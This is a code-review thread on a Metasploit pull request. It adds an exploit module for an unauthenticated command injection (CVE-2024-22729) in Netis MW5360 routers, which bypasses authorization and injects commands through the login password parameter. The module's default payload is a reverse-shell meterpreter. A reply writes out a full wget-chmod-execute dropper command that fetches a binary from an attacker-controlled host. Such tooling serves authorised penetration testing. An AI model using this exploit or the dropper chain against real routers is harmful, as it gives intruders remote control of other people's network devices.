modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb

```diff
@@ -0,0 +1,145 @@
+    super(
+      update_info(
+        info,
+        'Name' => 'Netis router MW5360 unauthenticated RCE.',
+        'Description' => %q{
+          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
+          The router's login page authorization can be bypassed by simply deleting the authorization header,
+          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
+          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+          to take control of the router.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Adhikara13' # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2024-22729'],
+          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],
+          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
+        ],
+        'DisclosureDate' => '2024-01-11',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),
+      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
+    ])
+  end
+
+  def execute_command(cmd, _opts = {})
+    # This is a customised linux dropper that only works with the wget command
+    # - payload need to be split because command chaining using ';' does not work
+    # - each command needs to be executed seperately
+    # - time between execution of each command need to be at least 30 seconds or more to avoid a lock
+    app_random = Rex::Text.rand_text_alphanumeric(4..8)
+    cmd_array = cmd.split(';')
```

Comment:
Is there any guarantee that the commands will be split by `;`, instead of say `&&`?

Reply:
well, the only exploit option that is available in the module is the Cmdstager (Linux Dropper) option with `CMDSTAGER::FLAVOR` setting `wget`. This generates always chained command payloads using `;` like below:
`wget -qO /tmp/WnFCnOIO http://192.168.1.2:1981/eKk8vg7v1i;chmod +x /tmp/WnFCnOIO;/tmp/WnFCnOIO;rm -f /tmp/WnFCnOIO`

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19188/commits/e7d65fe60a5b3b461cfe06ed1be8c69c2382866d.